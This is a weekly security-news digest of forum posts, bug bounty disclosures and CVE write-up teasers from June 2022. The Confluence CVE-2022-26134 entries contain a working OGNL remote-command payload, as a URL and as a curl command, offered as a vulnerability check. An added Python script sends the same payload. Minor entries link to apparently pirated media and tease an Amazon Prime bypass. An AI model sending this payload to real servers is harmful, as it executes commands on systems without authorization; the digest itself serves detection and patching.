    SecWiki Weekly (Issue 432) by ourren. For more of the latest articles, visit SecWiki
  • Open

    Remote Forensics on Live Systems
    I posted in /r/CrowdStrike about using Real Time Response to perform forensics. TL;DR While CrowdStrike offers Falcon Forensics, some organizations have not purchased it. I have seen a post mentioning KAPE, Kansa and PowerForensics. However, both the Kansa and PowerForensics projects seem to be unmaintained. Additionally, there were concerns about using KAPE as it could over-write memory, HDD space, etc. For Falcon Forensics, an EXE has to be copied (if not already present on the endpoint) and executed. Couldn't that over-write memory, HDD space, etc. as well? I am digging into the KAPE docs now and comparing the capabilities of Falcon Forensics to KAPE. What are folks using these days for remote forensics against live systems? Do you agree about the over-writing concerns? TIA Kevin submitted by /u/kevinelwell
    Anatomy of an NTFS FILE Record - Windows File System Forensics
    Good morning, It’s time for a new 13Cubed episode! In this one, we’ll talk about the structure and composition of an NTFS FILE record. Then, we'll take a look at a sample record for a resident file and learn how to manually extract the important attributes. Note that there is also an accompanying cheat sheet which may come in handy (see the video’s description)! Episode: https://www.youtube.com/watch?v=l4IphrAjzeY Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed
  • Open

    Dreamcast Games and Movies. Yes, people are still making new movies playable on Dreamcast.
    submitted by /u/RealAGB
    Older Movies and TV - Mostly Horror
    https://movies.encrypticmh.appboxes.co/ https://tv.encrypticmh.appboxes.co/ submitted by /u/sy029
    cow breeds
    submitted by /u/PM_ME_TO_PLAY_A_GAME
  • Open

    GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool
    A new, difficult-to-detect remote access trojan named PingPull is being used by GALLIUM, an advanced persistent threat (APT) group. The post GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool appeared first on Unit 42.
  • Open

    Lack of rate limit on authentication login page & forgot password page
    Showmax disclosed a bug submitted by saidkira: https://hackerone.com/reports/1591764
  • Open

    NTLM Authentication in Active Directory
    No content preview
    How to get started in Cybersecurity in 2022
    No content preview
  • Open

    A chat about the recent CVE-2022-30190
    Author: heige@Knownsec 404 Lab. Original link: https://mp.weixin.qq.com/s/tb0K-qLcZo-9OeW3KsIrTg Quite a few in-the-wild 0-days have been exposed recently, which looks like it will supply plenty of ammunition for this year's year-end summary. When I saw this vulnerability I left a brief comment in my WeChat Moments: CVE-2022-30190 (Follina) counts as a "divine bug" by my standards, and its quality is far higher than CVE-2021-40444. Every...
  • Open

    Screams of Power vulnerabilities (Powertek-based PDUs)
    (moved updates to the bottom) Even if the PDUs you use in your data center aren't branded "Powertek", please keep reading. Powertek is a company that makes datacenter-class smart PDUs (Power Distribution Units - i.e. heavy duty power cords) for server racks. They sell both directly (or at least used to in the past, I think?) and through their resellers. There is one reseller per country and they commonly rebrand their PDUs (e.g. mine has a logo of the Swiss reseller - schneikel). Anyway, in March I did a quick 3h review of the firmware and found multiple vulnerabilities and weaknesses in Powertek PDU firmware v3.30.23 and possibly prior (details below). So, if you're using a PDU that is running Powertek firmware, you might want to patch now. One more note on patch dist…

  • Open

    Best approach to start mobile (Android/iOS) exploit dev?
    Hello, I'm thinking about a career in mobile (Android/iOS, especially Android) security research and I would like to know what is the best way to go for it, in terms of methodology and best resources to learn from. I do have some experience with x86 Assembly and programming languages (mostly high level like C#, Dart and all, with some experience in C++ for software development). I would appreciate any suggestions, thank you very much in advance! submitted by /u/Ankhyx
  • Open

    How to check a Google Doc for when specific entries were made?
    I don't have editing permissions or anything like that. Is there any way to find out when a certain entry was made? I only have the downloaded file. I am trying to prove it was edited after a specific date submitted by /u/tirehu
    How can I tell if a document has come straight from the official source or if it has been opened and edited off that official site? I
    How can I tell if a document has come straight from the official source or if it has been opened and edited off that official site? I already know I have a document that has been tampered with because I was able to get the originals. Today I opened both of them up on my laptop through Google Docs and the authentic one opened up and looks exactly the same. And the altered one, when opened up, I noticed it opened up in a different layout. The text isn't the same size, some of the text is yellow, some of the letters like the "s" are changed to a $ sign. Does this show more proof that they were altered, I'm guessing on a computer not associated with the official place? I am not a computer person, but I remember professors saying how they can put your papers in something and it will show if parts are copied and pasted or plagiarized or whatever. So did I just discover more evidence that backs up on a tech level that these documents were altered after being received off of the original source? submitted by /u/Antique-Dark-907
  • Open

    Professional advice needed
    Utilizing my college years Hello all, I have recently just finished my first year of undergrad at UOregon, while being a Computer Science major. I have a strong interest in cybersecurity and went into this school hoping to find more opportunities to indulge in cybersec-like activities. At the beginning of the school year, I ended up landing an IT tech/helpdesk position at my school as well. A few months later, I landed a position at the cybersecurity office here at the school. So, I am currently working as a Student IT Technician and a Student Security Analyst. I plan on working the IT job through summer 2022, and then quitting to increase my hours at the analyst position. I plan on staying in that position until I graduate. This position also offers assistance and guidance towards certifications. I plan on getting my Network+ this summer, and then Security+ sometime in 2023. After I graduate I will have just about four years of experience within the cybersecurity dept. at my school. On another note, I am doing a good amount of home study as well, and really trying to push my Python skills to the next level. What I am really trying to do, and what will be my goal until I graduate, is to put myself in the best position, and set myself up as much as possible, to be able to land a great job once I graduate. The reason I am posting is to ask more experienced personnel: what more can I do to set myself up for a great career? I feel like I am on a good track at the moment, but I want to fully utilize the next 3 years I have in college. Thank you for reading! P.S. may be posting in other places, sorry for the spam if I end up doing so. submitted by /u/Straight_Bid_5577
    Wi-Fi malware
    I don't know if this is the right place to ask. If it's not, tell me where I should write it, thank you. My question may seem stupid but: I accidentally connected to a Wi-Fi which I've never seen before (and haven't ever seen after I disconnected). The Wi-Fi network was apparently one of my neighbor's networks, but again, never seen that wifi before and after. The Wi-Fi network had no password; I immediately disconnected, like in 5-10 seconds. Is it possible to get any malware or other kinds of unwanted software, spyware, adware through that WiFi connection? Thank you, and again, if this is the wrong place to ask about it, let me know. submitted by /u/mesropmashtots
    A question for full time pen testers
    All of these CTFs and junk really seem to get crazy about using gobuster or dirbuster. Do any of you full time pen testers that have been doing this for a while ever actually feel the need to use this? Now granted most of my experience is net pen not web app, but I wanted to get a consensus from more people. submitted by /u/networkalchemy
  • Open

    Vulnerability During Transition
    Article URL: https://biggestfish.substack.com/p/vulnerability-during-transition Comments URL: https://news.ycombinator.com/item?id=31716383 Points: 2 # Comments: 0
    Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)
    Article URL: https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/ Comments URL: https://news.ycombinator.com/item?id=31712986 Points: 42 # Comments: 1
  • Open

    Researcher defends Formidable in fight against ‘critical’ CVE assignment
    Article URL: https://portswigger.net/daily-swig/researcher-defends-formidable-in-fight-against-critical-cve-vulnerability-assignment Comments URL: https://news.ycombinator.com/item?id=31716274 Points: 2 # Comments: 0
  • Open

    I wrote a non technical post on my blog regarding security specialists, nihilistic behavior, and how to stay positive. Sometimes we need a reminder that, after all, things are not that bad.
    submitted by /u/last0x00 [link] [comments]
    A project for aspiring hackers to easily learn our craft
    submitted by /u/cr0mll [link] [comments]
    bevigil-cli : A handy tool to extract assets like subdomains, URL params, hosts, S3 buckets, URLs from android applications through BeVigil OSINT API with ease.
    submitted by /u/xscorp7 [link] [comments]
    NGINX security: Everything you may not need to know about NGINX error logs - complete guide
    submitted by /u/jwizq [link] [comments]
    I made a browser extension that spoofs your location data to match your VPN. It can also spoof your user agent.
    submitted by /u/z0ccc_z0ccc [link] [comments]
  • Open

    SecWiki News 2022-06-12 Review
    No news updates today. For more of the latest articles, visit SecWiki
  • Open

    Learning More About YAML Deserialization
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe: LazyAdmin
    No content preview
  • Open

    Phoneinfoga- Wikipedia of Phone Numbers.
    The Wikipedia Of Phone Number…Read This Article To Know All The Information Of Your Phone Number, Its All PUBLIC!! Continue reading on Medium »
  • Open

    The Four V’s of Effective Cybersecurity Posture
    There are four critical angles to achieve optimal cyber defense: Visibility, verification, vigilance, and validation. Rapid development… Continue reading on Purple Team »

  • Open

    All user password hash can be seen from admin panel
    UPchieve disclosed a bug submitted by dark_haxor: https://hackerone.com/reports/1489892
    CVE-2022-30115: HSTS bypass via trailing dot
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565622 - Bounty: $2400
    CVE-2022-27780: percent-encoded path separator in URL host
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565619 - Bounty: $2400
    CVE-2022-27779: cookie for trailing dot TLD
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565615 - Bounty: $2400
    Disclosure of the live_analytics information of any livestream
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1561299 - Bounty: $1000
    Email address disclosure via invite token validation
    TikTok disclosed a bug submitted by noob_but_cut3: https://hackerone.com/reports/1560072 - Bounty: $250
  • Open

    What is your experience with being a digital forensic investigator?
    I'm currently looking into this line of work and I wanted to know what it's like. I've seen some people have bad experiences while others recommend this job. submitted by /u/Late_Ranger5256 [link] [comments]
    FTK toolkit 6.3.1, software completely unusable during index and index merge
    Am I just some kind of moron, or is this software supposed to be 100% unusable for 15 straight hours while it does the initial index and then the index merge? Has FTK just turned into the ultimate billable hours machine? It's 2 million items; this shouldn't really be taking this long, right? submitted by /u/NinjaLion [link] [comments]
  • Open

    Binary Analysis with Strace
    submitted by /u/DLLCoolJ [link] [comments]
    OUs and GPOs and WMI Filters, Oh My!
    submitted by /u/5ub34x_ [link] [comments]
  • Open

    CREST CRT exam prep?
    I'm well on my way with studying for my CPSA. Any advice on any labs tryhackme rooms/paths or hackthebox boxes, that I should be concentrating on for CRT exam? any advice appreciated. submitted by /u/Snoo77500 [link] [comments]
    SlowLoris mitigation on SSH
    Hi, I know SlowLoris typically runs over HTTP, but for an assignment I had to run SlowLoris over SSH instead of HTTP and had to find ways to mitigate the attack. The usual answer you find for a standard SlowLoris attack is that you should use nginx, but even then there was conflicting information on the web. I tried to mitigate the attack over SSH with a simple iptables rule, but apparently there are more ways to stop this style of attack, especially if it is a distributed attack, where iptables would not really work. I tried to find a way to check for especially long-lasting or slow connections but did not find any good resources. How would you protect a system against such an attack? submitted by /u/curkus [link] [comments]
    How to use Chromium web developer tools to change the HTML and bypass to gain admin panel access?
    Hello, I was told I should check the HTML of the User Registration website (code at the bottom) to know how to do this. I think I should change this line of code: Admin Panel, but I don't know how to change the HTML. Should I use the web developer tools in Chromium? I've been blocked on this for too long. Thanks for any help. CODE: Password Confirm password Admin Panel div class="btn-group"> Info Only possible if you have a special autorisation submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    Timing from HackTheBox — Detailed Walkthrough
    No content preview
    [Bug Bounty] How I was able edit AWS’s files from file upload function?
    No content preview
  • Open

    SecWiki News 2022-06-11 Review
    Demystifying vulnerability propagation and its evolution through dependency trees in the NPM ecosystem, by ourren. For more of the latest articles, visit SecWiki
  • Open

    Index of open FTP servers
    https://www.mmnt.net/ there are many ftp servers indexed, like https://www.mmnt.net/db/0/0/88.166.133.247/Public/Films%20&%20S%C3%A9ries , films you can download. submitted by /u/iams0rry [link] [comments]
  • Open

    First CTF — Tenable CTF 2022
    So this week I did a thing, joined Tenable CTF this year. So far its honestly showing me my weak points. I look forward to seeing if I can… Continue reading on Medium »
  • Open

    Exposing HelloXD Ransomware and x4k
    HelloXD is a ransomware family in its initial stages – but already seeking to impact organizations. We analyze samples and hunt for attribution. The post Exposing HelloXD Ransomware and x4k appeared first on Unit 42.

  • Open

    photos of old paintings
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Is it possible to explore hidden folders of open directories ?
    Sometimes when you explore open directories, by adding /storage, /drive or /disk to the top level of the open directory index address you can enter and access a kind of hidden directory which was not visible at the top level of the open directory index! But it is a hard job to do manually, adding /storage1, /drive2, /disk3, etc. (as I am not even sure those directories exist); it depends on the directory, but sometimes it exists! So I want to know if there are any tips for exploring "the hidden directories that are not present at the top index level but which are actually accessible by manually typing them into the address bar". Thanks in advance, guys. submitted by /u/Synchel [link] [comments]
  • Open

    Denial of Service Vulnerability in Envoy Proxy – CVE-2022-29225
    Article URL: https://jfrog.com/blog/denial-of-service-vulnerability-in-envoy-proxy-cve-2022-29225/ Comments URL: https://news.ycombinator.com/item?id=31700170 Points: 1 # Comments: 1
  • Open

    Apple M1 chip contains hardware vulnerability that bypasses memory defense
    Article URL: https://www.theregister.com/2022/06/10/apple_m1_pacman_flaw/ Comments URL: https://news.ycombinator.com/item?id=31696129 Points: 5 # Comments: 0
    Vulnerability in Gitlab: Sending Arbitrary Requests Through Jupyter Notebooks
    Article URL: https://liman.io/blog/gitlab-security-vulnerability-jupyter-notebooks Comments URL: https://news.ycombinator.com/item?id=31695949 Points: 3 # Comments: 0
    MIT Finds Apple M1 Vulnerability, Demos Pacman Attack
    Article URL: https://www.tomshardware.com/news/mit-finds-vulnerability-in-arm-chips-demos-pacman-attack-on-apple-m1 Comments URL: https://news.ycombinator.com/item?id=31693578 Points: 5 # Comments: 1
    Apple M1 Affected by Pacman Hardware Vulnerability in Arm Pointer Authentication
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=Apple-M1-PACMAN Comments URL: https://news.ycombinator.com/item?id=31692824 Points: 7 # Comments: 2
    Security Vulnerability in Gitlab: Sending Requests Through Jupyter Notebooks
    Article URL: https://liman.io/blog/gitlab-security-vulnerability-jupyter-notebooks Comments URL: https://news.ycombinator.com/item?id=31691130 Points: 1 # Comments: 0
  • Open

    password manager for IT department
    What is everyone using in their IT department to share passwords? I'm looking for something with MFA/YubiKey support. Reading about Dashlane and 1Password, it seems like in the past year I read that both are not what they used to be. Bitwarden, some say, is clunky, but it seems well liked. I'm really looking for something that syncs to the cloud, so we have offline access. submitted by /u/clarksavagejunior [link] [comments]
    Does Windows Defender detect Follina?
    If it does, what does it call it? Does MS have a different name for this attack, or does it only detect the payload it tries to inject? submitted by /u/ThePorko [link] [comments]
    Broad subject, overwhelmed by choice of programming languages to focus on.
    Hi, I'm a 2nd year Cybersecurity student and I am shooting for a career along the lines of pentesting, cybersec researcher, or network engineer. I studied Python but, frankly, I sucked and I needed much more practice. At the same time I have a 3 month break with no studies where I want to use this time to choose a language to learn. Cybersecurity is such a broad subject. Sometimes I can't see the forest for the trees. I need help on choosing where to focus my efforts. These are my choices: Learn C; Learn (more) Bash; Learn (more) Python. As far as resources, I have: Devices: a smartphone, a busted laptop failing to run Kali Linux waiting for a fresh install, and an Ubuntu desktop. Books: The Rootkit Arsenal by Bill Blunden; Applied Cryptography: Protocols, Algorithms and Source Code in C by Bruce Schneier; Black Hat Python by Justin Seitz. Online: Cisco Network Academy courses (networking essentials, cloud computing), first year study materials for subjects on Python coding, Linux shell, operating systems, hardware, OS architecture, and a subscription to TryHackMe (offensive security path). I'd really appreciate your thoughts because I feel like I've got all this gear and all this motivation but... where to start, and which info will still be useful in 20 years? 50 years? submitted by /u/hobnobmatrixx [link] [comments]
  • Open

    bd-j exploit chain
    PlayStation disclosed a bug submitted by theflow0: https://hackerone.com/reports/1379975 - Bounty: $20000
    RXSS on
    U.S. Dept Of Defense disclosed a bug submitted by tmz900: https://hackerone.com/reports/1555582
  • Open

    SecWiki News 2022-06-10 Review
    A study of supply-chain attacks on package managers for interpreted languages, by ourren. For more of the latest articles, visit SecWiki
  • Open

    Brainpan 1 WriteUp Tryhackme
    No content preview
  • Open

    HP Server Raid
    I have got two HP servers (a Z820 Workstation and a ProLiant DL360p Gen 8); these both have 4 x 10 TB disks inside. I cannot turn these on due to various reasons. I have used X-Ways to try and rebuild the RAID using Level 5 Backward Delayed (HP); it showed there is an LVM2 container. I found a video online that shows you need to scan for the lost partitions, which I did, but it did not bring back any results. I have also tried using RAID Reconstructor but it is unable to tell me anything about the RAID settings, which makes me believe it is a proprietary HP RAID. Any suggestions on getting these RAIDs rebuilt would be appreciated. submitted by /u/ambitiousdonut94 [link] [comments]
  • Open

    CVE-2022-0540: Atlassian JIRA authentication bypass vulnerability with a wide range of impact
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/3EWju-IdsTfK7COKOK-c-w Vulnerability information: JIRA has an authentication bypass vulnerability in its Seraph component, with a wide range of impact. According to the official description, a large number of default and third-party plugins are affected. About the Seraph Filter: for an authentication bypass, the problem probably lies in the Filter chain; JIRA wraps a fairly large number of Filters internally...
    CVE-2022-1388: Analysis of the F5 BIG-IP iControl REST request-handling process and reproduction of the authentication bypass vulnerability
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw Vulnerability information: F5 BIG-IP is an application delivery platform from the US company F5 that integrates network traffic management, application security management, load balancing and other functions. On 2022-05-04, F5 published a security advisory fixing an authentication bypass vulnerability in BIG-IP iControl REST. Vulnerability ID: CVE-2022-13...

  • Open

    Launching the PortSwigginar
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the tool for those who have
  • Open

    Cyber Security Mind Map: Any ideas here useful?
    Does anyone think any of these ideas in green are worthwhile? Cyber Security Mind Map I'm looking for honest feedback. I just used the SCAMPER technique, along with this mind map to think of these ideas. For example, focusing on Anti-Malware with SCAMPER... I just went through some of the questions in the video for Substitute, Combine, Adapt, Modify, Purpose, and Rearrange to generate new ideas relating to Anti-Malware and other topics. My question is would any of the ideas described in the mind map be useful in preventing or detecting attacks? I haven't been able to get any feedback so far. :( submitted by /u/greyyit [link] [comments]
  • Open

    Magnet business strategy and pricing (Cyber?)
    What do you think about Magnet not including the Email Explorer feature in the non-Cyber version of AXIOM? https://www.magnetforensics.com/blog/reviewing-email-evidence-with-email-explorer-in-magnet-axiom-cyber/ It seems that they are starting to carve out features to force customers into AXIOM Cyber. AXIOM Cyber is 12K USD, I think. As a reminder, this is what we used to pay when they released AXIOM 4 years ago: IEF: $3,625; AXIOM Computer: $3,800; AXIOM (Computer & Mobile): $5,600. Their spiel is that Cyber will be corporate-oriented and standard AXIOM LEO-oriented, but I am not buying that. Love the software, but they always played with features being extra and then just charging more. This was the IEF comment I got at the AXIOM release time (email quote): "We rolled all the artifacts up into new IEF licenses so customers wouldn’t have to come back to us to buy any modules they may have forgot to include." More like we were forgetting to go deeper in the wallet, so we made it mandatory... submitted by /u/Erminger [link] [comments]
    moto stylus
    Has anyone been able to get an image of this phone moto stylus ? I just need the call list if there is some way to obtain it. Thanks submitted by /u/JW4704 [link] [comments]
    Mount Navigation Device as Mass Storage instead of MTP
    Is there a way to sort of force-mount a navigation device (Garmin) as Mass Storage so I can pull a physical image? submitted by /u/visorov [link] [comments]
    Filesystem Imaging iOS
    Hello community … I’m trying to create a dd image of the filesystem for iOS 9.3.5 and 12. After SSHing into the device, when trying to create the dd image, it displays "resource is busy"; the umount command also shows the partition is busy. How may I proceed to create the dd image or create a tarball? Any suggestions would be helpful. submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    SecWiki News 2022-06-09 Review
    Microsoft data security protection: Know Your Data, by ourren; Some thoughts on data security, by ourren; Security operations as I understand it, by adrain; Trends in cybersecurity technology innovation as seen from the RSAC 2022 Innovation Sandbox, by ourren. For more of the latest articles, visit SecWiki
  • Open

    WMI Providers for Script Kiddies
    Introduction So, this WMI stuff seems legit. Admins get a powerful tool which Script Kiddies can also use for profit. But there’s gotta be more, right? What if I want to take my WMI-fu to the next level? In the previous blog post, “WMI for Script Kiddies,” we described Windows Management Instrumentation (WMI). We detailed... The post WMI Providers for Script Kiddies appeared first on TrustedSec.
  • Open

    LockBit 2.0: How This RaaS Operates and How to Protect Against It
    LockBit 2.0 has so far been this year's most active ransomware gang on double-extortion leak sites. Learn about their tactics. The post LockBit 2.0: How This RaaS Operates and How to Protect Against It appeared first on Unit 42.
  • Open

    Moderator can enable cam/mic remotely if cam/mic-permission was disabled while user has activated cam/mic
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1520685 - Bounty: $100
    Integer overflows in unescape_word()
    curl disclosed a bug submitted by ddme: https://hackerone.com/reports/1564922
    match
    curl disclosed a bug submitted by maslahhunter: https://hackerone.com/reports/1555440
  • Open

    Tesla NFC Key Card Security Vulnerability Demonstration
    Article URL: https://old.reddit.com/r/teslamotors/comments/v86pc1/tesla_nfc_key_card_security_vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31680342 Points: 2 # Comments: 0
    Zero-Day Vulnerability in Atlassian Confluence
    On 2022-06-03, a new zero-day vulnerability occurred. CVE-2022-26134 is a command injection vulnerability. According to the report, a zero-day attack began during the Memorial Day holiday in the United States, and an attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell. You can see the full report on this blog: https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ . EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with curl or a Python script to determine the vulnerability of your Confluence server. Even if you are not an information security officer, there is a way to check the vulnerability of your company’s Confluence. Try the following method and immediately request patches from your security department: https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#result))}/ If you change the your_confluence_address part to your Confluence address, you can check it with curl as follows. If the uid, gid, and groups of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have the CVE-2022-26134 vulnerability. curl -v -k --head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response Comments URL: https://news.ycombinator.com/item?id=31677086 Points: 17 # Comments: 6
  • Open

    CVE-2021-40444: Microsoft MSHTML remote command execution vulnerability analysis (Part 3)
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/hHlscdLIvO0BY173ksq8vA Continued from the previous posts. Part 1, sample analysis: CVE-2021-40444 Microsoft MSHTML remote command execution vulnerability analysis (Part 1). Part 2, vulnerability reproduction: CVE-2021-40444 Microsoft MSHTML remote command execution vulnerability analysis (Part 2). This third part of the series mainly covers the root cause and mechanism of the vulnerability...
    CVE-2021-40444: Microsoft MSHTML remote command execution vulnerability analysis (Part 2)
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/q0lbegDjLViLI48N6RjGVw Continued from the previous post. Part 1, sample analysis: CVE-2021-40444 Microsoft MSHTML remote command execution vulnerability analysis (Part 1). After analysing the sample circulating online, I set out to reproduce the vulnerability by replacing the files inside the cab file. Installed Office version: Microsoft Word 2016 (16....
    CVE-2021-40444: Microsoft MSHTML remote command execution vulnerability analysis (Part 1)
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/6q9fbggpkhd4PtwnghvZgg Vulnerability overview: On 2021-09-08, Microsoft published a security advisory disclosing a remote code execution vulnerability in Microsoft MSHTML. An attacker can craft a malicious ActiveX control for use by a Microsoft Office document that hosts the browser rendering engine; once a user is successfully lured into opening the malicious document, code can be executed on the target system with that user's privileges...
  • Open

    Analysis report of Zero-day Vulnerability in Atlassian Confluence.
    On 2022-06-03, a new zero-day vulnerability occurred. CVE-2022-26134 is a command injection vulnerability. According to the report, a zero-day attack began during the Memorial Day holiday in the United States, and an attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell. You can see the full report on this blog: https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ . https://preview.redd.it/uvzj6bb2ai491.png?width=933&format=png&auto=webp&s=1e4e10b5a3e71515abdc1d3de3dd2e5b0e7ed3d7 EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with curl or a Python script to determine the vulnerability of your Confluence server. Even if you are not an information security officer, there is a way to check the vulnerability of your company’s Confluence. Try the following method and immediately request patches from your security department: https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#result))}/ If you change the your_confluence_address part to your Confluence address, you can check it with curl as follows. If the uid, gid, and groups of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have the CVE-2022-26134 vulnerability. curl -v -k --head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response submitted by /u/Late_Ice_9288 [link] [comments]
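    The vulnerability check from the Confluence post above (it appears twice on this page, once via Hacker News and once via Reddit), as an added example that is not from the post, from Criminal IP, or from Atlassian: the same OGNL probe built and classified in Python, with the response-header test written as a pure function so it can be checked offline. `https://confluence.example`, the `probe()` helper (a HEAD request via urllib, standing in for the post's `curl --head`) and the sample header values in the usage are assumptions, not part of the original.

```python
# Added example (not from the post or from Atlassian): the CVE-2022-26134 check
# described above, split into pure functions so it can be exercised offline.
import re
import ssl
import urllib.error
import urllib.request
from typing import Mapping, Optional
from urllib.parse import quote

# The OGNL expression the post places in the URL path. A vulnerable Confluence
# evaluates it, runs `id`, and copies the output into the X-Cmd-Response header.
OGNL_PROBE = (
    '${(#a=@org.apache.commons.io.IOUtils@toString('
    '@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).'
    '(@com.opensymphony.webwork.ServletActionContext@getResponse()'
    '.setHeader("X-Cmd-Response",#a))}'
)

# Shape of `id` output, e.g. "uid=1001(confluence) gid=1001(confluence) groups=..."
ID_OUTPUT = re.compile(r"uid=\d+(\([^)]*\))?\s+gid=\d+")


def build_check_url(base_url: str) -> str:
    """Return base address + percent-encoded OGNL expression + trailing slash.

    safe='' encodes every reserved character (including '(' and '#'), which
    reproduces the encoded path from the post's curl command byte for byte.
    """
    return base_url.rstrip("/") + "/" + quote(OGNL_PROBE, safe="") + "/"


def cmd_response(headers: Mapping[str, str]) -> Optional[str]:
    """Return the X-Cmd-Response value (case-insensitive lookup) or None."""
    for name, value in headers.items():
        if name.lower() == "x-cmd-response":
            return value
    return None


def is_vulnerable(headers: Mapping[str, str]) -> bool:
    """True when the header carries `id`-style output, as the post describes.

    A patched server returns no X-Cmd-Response at all, and an arbitrary value
    in that header (e.g. echoed by a proxy or WAF) is not counted as a hit.
    """
    value = cmd_response(headers)
    return bool(value) and ID_OUTPUT.search(value) is not None


def probe(base_url: str, timeout: float = 10.0, verify_tls: bool = True) -> bool:
    """Send the HEAD request from the post (curl --head) and classify the answer.

    verify_tls=False mirrors curl -k for self-signed internal instances. Only
    run this against Confluence servers you are authorized to test: a
    vulnerable server executes `id` when it receives the request.
    """
    ctx = ssl.create_default_context() if verify_tls else ssl._create_unverified_context()
    req = urllib.request.Request(build_check_url(base_url), method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return is_vulnerable(dict(resp.headers.items()))
    except urllib.error.HTTPError as err:
        # A non-2xx status can still carry the header on a vulnerable host
        return is_vulnerable(dict(err.headers.items()))


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        print("vulnerable" if probe(sys.argv[1], verify_tls=False) else "not detected")
    else:
        # Constructed base address, for showing the URL without touching the network
        print(build_check_url("https://confluence.example"))
```

    `quote(..., safe='')` reproduces the encoded path from the post's curl line exactly, so the Python and curl checks send the same request; the header test looks for the `uid=`/`gid=` shape rather than accepting any value, so a proxy that merely reflects the header name is not reported as vulnerable.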

  • Open

    Active directory scripts for setting a lab?
    Are there any good resources or scripts etc... to build your own AD server to do some labs on? submitted by /u/networkalchemy [link] [comments]
    IAST that works with AWS Fargate and Lambda
    Hey everyone. Does anyone have any recommendations for an IAST tool that may work with Fargate and Lambda? I've run a few DAST trials and none of them seem to work well with React.js SPAs (Tenable, Probely, Detectify, etc.). We have EKS (Fargate) for the customer-facing app and many smaller Lambda services behind API Gateway. submitted by /u/greyeye77 [link] [comments]
  • Open

    Mostly newer US & UK movies & TV; some classics & grindhouse sprinkled in
    http://vod.simpletv.eu/media/storage/ submitted by /u/acidwashvideo [link] [comments]
  • Open

    Exploiting Amazon active vulnerability
    How to exploit an Amazon active vulnerability and get access to Prime (& all it’s benefits, including all Prime Video Channels) for FREE!… Continue reading on Medium »
    Setting Up Burp Suite
    Day 0: Recon Continue reading on Medium »
    Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc I’m tired of everything. Continue reading on Medium »
    [BugBounty] Tips to Find Stored XSS
    Intro Continue reading on InfoSec Write-ups »
    What Is Bug Bounty — How To Make Money As A Hacker — NM Tech blog — Sharing Tech Knowledge
    1) What is Bug Bounty Continue reading on Medium »
    Don’t get caught in the viewer list of any user story of Instagram
    Hi Continue reading on Medium »
    Announcing Qilin V2 Mainnet Bug Bounty Program on Immunefi
    Following our V2 mainnet launch on April 21st, Qilin will initiate a new round of its long-term Bug Bounty Program with a total reward of… Continue reading on Medium »
  • Open

    what is your preferred tool to capture websites?
    Seeking info regarding what tools you have used to capture website pages for investigation purposes. submitted by /u/ATXChimera [link] [comments]
    EnCase 20.2 not detecting local storage or removable media on Add Evidence menu
